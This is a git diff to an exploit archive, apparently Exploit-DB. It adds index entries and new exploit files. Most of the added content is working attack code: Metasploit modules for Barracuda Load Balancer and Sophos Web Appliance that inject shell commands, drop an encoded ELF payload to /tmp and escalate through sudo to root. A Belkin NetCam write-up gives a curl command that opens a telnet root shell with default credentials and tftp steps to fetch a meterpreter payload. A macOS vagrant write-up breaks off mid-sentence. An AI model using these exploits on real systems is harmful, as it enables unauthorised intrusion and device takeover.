diff --git a/files.csv b/files.csv
index 7ed0f9397..2c44dadc7 100644
--- a/files.csv
+++ b/files.csv
@@ -5609,6 +5609,9 @@ id,file,description,date,author,platform,type,port
42300,platforms/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
42301,platforms/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos,0
42302,platforms/windows/dos/42302.txt,"Firefox 54.0.1 - Denial of Service",2017-07-07,hyp3rlinx,windows,dos,0
+42336,platforms/windows/dos/42336.html,"Microsoft Internet Explorer 11.0.9600.18617 - 'CMarkup::DestroySplayTree' Memory Corruption",2017-07-18,"Google Security Research",windows,dos,0
+42337,platforms/windows/dos/42337.html,"Microsoft Internet Explorer 11.1066.14393.0 - VBScript Arithmetic Functions Type Confusion",2017-07-18,"Google Security Research",windows,dos,0
+42338,platforms/windows/dos/42338.cpp,"Microsoft Windows Kernel - 'IOCTL 0x120007 (NsiGetParameter)' nsiproxy/netio Pool Memory Disclosure",2017-07-18,"Google Security Research",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9133,6 +9136,7 @@ id,file,description,date,author,platform,type,port
42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
+42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion <= 4.0.20 - Local root Privilege Esclation",2017-07-18,"Mark Wadham",macos,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15696,6 +15700,7 @@ id,file,description,date,author,platform,type,port
42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
+42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37762,8 +37767,8 @@ id,file,description,date,author,platform,type,port
41410,platforms/php/webapps/41410.txt,"Joomla! Component Magic Deals Web 1.2.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41411,platforms/php/webapps/41411.txt,"Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41412,platforms/php/webapps/41412.txt,"Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
-41413,platforms/hardware/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
-41414,platforms/hardware/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
+41413,platforms/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,php,webapps,0
+41414,platforms/linux/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,linux,webapps,0
41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
@@ -38051,7 +38056,7 @@ id,file,description,date,author,platform,type,port
42003,platforms/php/webapps/42003.txt,"PlaySms 1.4 - Remote Code Execution",2017-05-14,"Touhid M.Shaikh",php,webapps,0
42004,platforms/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,php,webapps,0
42005,platforms/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",php,webapps,0
-42012,platforms/hardware/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,hardware,webapps,0
+42012,platforms/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,php,webapps,0
42013,platforms/hardware/webapps/42013.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2 - Multiple Vulnerabilities",2017-01-12,SlidingWindow,hardware,webapps,0
42028,platforms/xml/webapps/42028.txt,"INFOR EAM 11.0 Build 201410 - 'filtervalue' SQL Injection",2017-05-17,Yoroi,xml,webapps,0
42029,platforms/xml/webapps/42029.txt,"INFOR EAM 11.0 Build 201410 - Persistent Cross-Site Scripting via Comment Fields",2017-05-17,Yoroi,xml,webapps,0
@@ -38140,3 +38145,6 @@ id,file,description,date,author,platform,type,port
42324,platforms/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps,0
42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0
42330,platforms/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,php,webapps,0
+42332,platforms/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,json,webapps,0
+42333,platforms/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware <= 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps,0
+42335,platforms/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",multiple,webapps,0
diff --git a/platforms/hardware/remote/42331.txt b/platforms/hardware/remote/42331.txt
new file mode 100755
index 000000000..29b18c827
--- /dev/null
+++ b/platforms/hardware/remote/42331.txt
@@ -0,0 +1,65 @@
+# Exploit Title: Belkin NetCam F7D7601 | Remote Command Execution
+# Date: 17/07/17
+# Exploit Author: Wadeek
+# Vendor Homepage: http://www.belkin.com/
+# Tested on: Belkin NetCam F7D7601 (WeMo_NetCam_WW_2.00.10684.PVT)
+================================================
+##
+UnsetupMode == [0]
+Hard-coded password admin:admin - SetupMode == [1]
+##
+================================================
+##
+[1] BusyBox version & Linux version & gcc version >> GET http://[IP]:80/goform/syslog
+[1] System version >> GET http://[IP]:80/goform/getSystemSettings?systemModel&systemVersion&brandName&longBrandName
+[1] Camera snapshot >> GET http://[IP]:80/goform/snapshot
+[1] Camera streaming >> GET http://[IP]:80/goform/video
+[101] Disclosure username and password on netcam.belkin.com >> GET http://[IP]:80/goform/apcamMode
+[101] Disclosure wifi password >> GET http://[IP]:80/apcam/for-android/aplist.asp
+[0] Firmware version >> GET http://[IP]:[49150..49159]/setup.xml
+##
+================================================
+#||
+================================================
+[0] Network Fingerprinting
+##
+80/tcp open http
+HTTP/1.1 404 Site or Page Not Found
+Server: Camera Web Server
+Document Error: Site or Page Not Found
+Access Error: Site or Page Not Found
+Page Not Found
+&&
+[49150..49159]/tcp open UPnP
+HTTP/0.0 400 Bad Request
+SERVER: Unspecified, UPnP/1.0, Unspecified
+400 Bad Request
+##
+================================================
+#||
+================================================
+[1] Wireless Fingerprinting
+##
+ESSID:"NetCamXXXX"
+Encryption key:off
+Address: C0:56:27
+##
+[1] Network Fingerprinting
+##
+80/tcp open http
+HTTP/1.1 401 Unauthorized
+Server: Camera Web Server
+WWW-Authenticate: Basic realm="Camera Web Server"
+Document Error: Unauthorized
+Access Error: Unauthorized
+Access to this document requires a User ID
+##
+[1] Remote Command Execution
+/!/ !/
+:~$ curl 'http://[IP]/goform/SystemCommand?command=telnetd%20-l%20/bin/sh' -H 'Authorization: Basic YWRtaW46YWRtaW4='
+:~$ telnet [IP] 23
+upload by FTP # ftpput -v -u [USERNAME] -p [PASSWORD] -P [PORT] [IP] [REMOTE-FILENAME] [LOCAL-FILENAME]
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+/!/ !/
+================================================
\ No newline at end of file
diff --git a/platforms/hardware/webapps/42333.rb b/platforms/hardware/webapps/42333.rb
new file mode 100755
index 000000000..208d0ada1
--- /dev/null
+++ b/platforms/hardware/webapps/42333.rb
@@ -0,0 +1,248 @@
+# Exploit Title: Barracuda Load Balancer Firmware <= v6.0.1.006 (2016-08-19) PostAuth remote root exploit
+#
+# Date: 01/06/2017 (Originally discovered: 3/16)
+# Exploit Author: xort
+# Software Link: https://www.barracuda.com/products/loadbalancer
+# Version: Firmware <= v6.0.1.006 (2016-08-19)
+# Tested on: 6.0.1.006 (2016-08-19)
+# 6.0.0.005 (2016-03-22) - checked:4/8/16
+# 5.4.0.004 (2015-11-26) - checked:3/16
+#
+# Not Vuln: 6.1.0.003 (2017-01-17)
+# CVE : CVE-2017-6320
+#
+# vuln: ondefined_delete_assessment trigger exploit
+#
+# Postauth remote root in Barracuda Load Balancer Firmware <= v6.0.1.006 for any under priviledged user with report generating
+# capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain
+# root.
+#
+# xort @ Critical Start
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Barracuda Load Balancer Firmware <= v6.0.1.006 delete_assessment root exploit',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Barracuda Load Balancer Firmware Version <= v6.0.1.006 (2016-08-19) by exploiting a
+ vulnerability in the web administration interface.
+ By sending a specially crafted request it's possible to inject system
+ commands while escalating to root do to relaxed sudo configuration on the local
+ machine.
+ },
+ 'Author' =>
+ [
+ 'xort', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 2 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Privileged' => false,
+
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ ['Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ false, 'Device password', "" ]),
+ OptString.new('ET', [ false, 'Device password', "" ]),
+ OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(8000),
+ ], self.class)
+ end
+
+ def do_login(username, password_clear, et)
+ vprint_status( "Logging into machine with credentials...\n" )
+
+ # vars
+ timeout = 1550;
+ enc_key = Rex::Text.rand_text_hex(32)
+
+ # send request
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => "/cgi-mod/index.cgi",
+ 'headers' =>
+ {
+ 'Accept' => "application/json, text/javascript, */*; q=0.01",
+ 'Content-Type' => "application/x-www-form-urlencoded",
+ 'X-Requested-With' => "XMLHttpRequest"
+ },
+ 'vars_post' =>
+ {
+
+ 'enc_key' => enc_key,
+ 'et' => et,
+ 'user' => "admin", # username,
+ 'password' => "admin", # password_clear,
+ 'enctype' => "none",
+ 'password_entry' => "",
+ 'login_page' => "1",
+ 'login_state' => "out",
+ 'real_user' => "",
+ 'locale' => "en_US",
+ 'form' => "f",
+ 'Submit' => "Sign in",
+ }
+ }, timeout)
+
+ # get rid of first yank
+ password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
+ et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
+
+ return password, et
+ end
+
+ def run_command(username, password, et, cmd)
+ vprint_status( "Running Command...\n" )
+
+ # file to replace
+ #sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
+ sudo_cmd_exec = "/home/product/code/firmware/current/bin/rdpd"
+
+ sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
+ sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
+
+ # random filename to dump too + 'tmp' HAS to be here.
+ b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
+
+ vprint_status(" file = " + b64dumpfile)
+
+ # decoder stubs - tells 'base64' command to decode and dump data to temp file
+ b64decode1 = "echo \""
+ b64decode2 = "\" | base64 -d >" + b64dumpfile
+
+ # base64 - encode with base64 so we can send special chars and multiple lines
+ cmd = Base64.strict_encode64(cmd)
+
+ # Create injection string.
+ # a) package the base64 decoder with encoded bytes
+ # b) attach a chmod +x request to make the script created (b64dumpfile) executable
+ # c) execute decoded base64 dumpfile
+
+ injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile # + " ; rm " + b64dumpfile
+
+ exploitreq = [
+ [ "auth_type","Local" ],
+ [ "et",et ],
+ [ "locale","en_US" ],
+ [ "password", password ],
+ [ "primary_tab", "ADVANCE" ],
+ [ "realm","" ],
+ [ "secondary_tab","advanced_system" ],
+ [ "user", username ],
+ [ "timestamp", Time.now.to_i ],
+
+ [ "UPDATE_scan_information_in_use", "xx; #{injection_string}" ], # vuln
+ [ "delete_assessment", Rex::Text.rand_text_numeric(20) ]
+ ]
+
+ boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
+
+ post_data = ""
+
+ exploitreq.each do |xreq|
+ post_data << "--#{boundary}\r\n"
+ post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
+ post_data << "#{xreq[1]}\r\n"
+ end
+ post_data << "--#{boundary}--\r\n"
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-mod/index.cgi",
+ 'ctype' => "multipart/form-data; boundary=#{boundary}",
+ 'data' => post_data,
+ 'headers' =>
+ {
+ 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
+ }
+ })
+ end
+
+ def run_script(username, password, et, cmds)
+ vprint_status( "running script...\n")
+
+
+ end
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ user = "admin"
+
+ # params
+ real_user = "";
+ login_state = "out"
+ et = Time.now.to_i
+ locale = "en_US"
+ user = "admin"
+ password = "admin"
+ enctype = "MD5"
+ password_entry = ""
+ password_clear = "admin"
+
+ password_hash, et = do_login(user, password_clear, et)
+ vprint_status("new password: #{password_hash} et: #{et}\n")
+
+ sleep(5)
+
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+ run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+# run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
+
+ run_command(user, password_hash, et, ("printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
+ handler
+ end
+
+
+ end
+
+end
diff --git a/platforms/json/webapps/42332.rb b/platforms/json/webapps/42332.rb
new file mode 100755
index 000000000..838ee53c8
--- /dev/null
+++ b/platforms/json/webapps/42332.rb
@@ -0,0 +1,180 @@
+# Exploit Title: Sophos Web Appliance reporting JSON trafficType Remote Command Injection Vulnerablity
+# Date: 01/28/2017
+# Exploit Author: xort @ Critical Start
+# Vendor Homepage: www.sophos.com
+# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx
+# Version: 4.3.0.2
+# Tested on: 4.3.0.2
+#
+# CVE : (awaiting cve)
+
+# vuln: report command / trafficType JSON parameter / ???.php exploit
+
+# Description PostAuth Sophos Web App FW <= v4.3.0.2 for capablities. This exploit leverages a command injection bug.
+#
+# xort @ Critical Start
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sophos Web Appliace <= v4.3.0.2 JSON reporting remote exploit',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Sophos Web Appliace Version <= v4.3.0.2. The vulnerability exist in
+ a section of the machine's reporting inferaface that accepts unsanitized
+ unser supplied information within a JSON query.
+ },
+ 'Author' =>
+ [
+ 'xort@Critical Start', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 1 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ ['Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ false, 'Device password', "" ]),
+ OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(443),
+ ], self.class)
+ end
+
+ def do_login(username, password_clear)
+ vprint_status( "Logging into machine with credentials...\n" )
+
+ # vars
+ timeout = 1550;
+ style_key = Rex::Text.rand_text_hex(32)
+
+ # send request
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => "/index.php",
+ 'vars_get' => {
+ 'c' => 'login',
+ },
+ 'vars_post' =>
+ {
+
+ 'STYLE' => style_key,
+ 'destination' => '',
+ 'section' => '',
+ 'username' => username,
+ 'password' => password_clear
+ },
+ 'headers' => {
+ 'Connection' => 'close',
+ }
+
+ }, timeout)
+
+ return style_key
+ end
+
+ def run_command(username, style_password, cmd)
+
+ vprint_status( "Running Command...\n" )
+
+ # send request with payload
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/index.php",
+ 'vars_post' => {
+ 'chart' => 'pie',
+ 'period' => 'custom',
+ 'multiplier' => '1',
+ 'metric' => '',
+ 'token' => '0.3156784180233425',
+ 'start' => '1/27/2017',
+ 'end' => '1/27/2017',
+ 'filters' => '{"topn": "25", "trafficType": "out|'+cmd+'&", "department": "sophos_swa_all_departments"}',
+ 'pdf' => '1',
+ 'test' => '',
+ 'STYLE' => style_password ,
+ },
+ 'vars_get' => {
+ 'c' => 'report',
+ 'name' => 'traf_users',
+ 'STYLE' => style_password ,
+ },
+ })
+
+ end
+
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ # params
+ password_clear = datastore['PASSWORD']
+ user = datastore['USERNAME']
+
+ # do authentication
+ style_hash = do_login(user, password_clear)
+
+ vprint_status("STATUS hash authenticated: #{style_hash}\n")
+
+ # pause to let things run smoothly
+ sleep(2)
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\\x\1\2')
+
+ # upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
+ run_command(user, style_hash, ("echo -e #{encoded_cmd}>/tmp/n;chmod +rx /tmp/n;/tmp/n" ))
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\\x\1\2')
+
+ # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
+ run_command(user, style_hash, ("(echo -e #{encoded_elf}>/tmp/m;chmod +rx /tmp/m;/tmp/m)"))
+
+ # wait for magic
+ handler
+
+ end
+
+
+ end
+end
diff --git a/platforms/hardware/webapps/41414.rb b/platforms/linux/webapps/41414.rb
similarity index 100%
rename from platforms/hardware/webapps/41414.rb
rename to platforms/linux/webapps/41414.rb
diff --git a/platforms/macos/local/42334.txt b/platforms/macos/local/42334.txt
new file mode 100755
index 000000000..53f0fd8f6
--- /dev/null
+++ b/platforms/macos/local/42334.txt
@@ -0,0 +1,70 @@
+I'm a big fan of Hashicorp but this is an awful bug to have in software of their
+calibre.
+
+Their vagrant plugin for vmware fusion uses a product called Ruby Encoder to
+protect their proprietary ruby code. It does this by turning the ruby code into
+bytecode and executing it directly.
+
+Unfortunately the execution chain necessary for this to work is not safe. After
+installing the plugin, the first time you "vagrant up" any vagrant file using
+vmware fusion it will create some files in
+~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.18/bin:
+
+vagrant_vmware_desktop_sudo_helper
+vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386
+vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64
+vagrant_vmware_desktop_sudo_helper_wrapper_linux_386
+vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64
+
+The first one is an encoded ruby script, the others are "sudo helper" binaries
+for the different platforms supported by the plugin. Of these sudo helpers,
+the one that corresponds to your platform will be made suid root when vagrant up
+is run.
+
+Unfortunately the helper calls the ruby script with system("ruby
+
+
+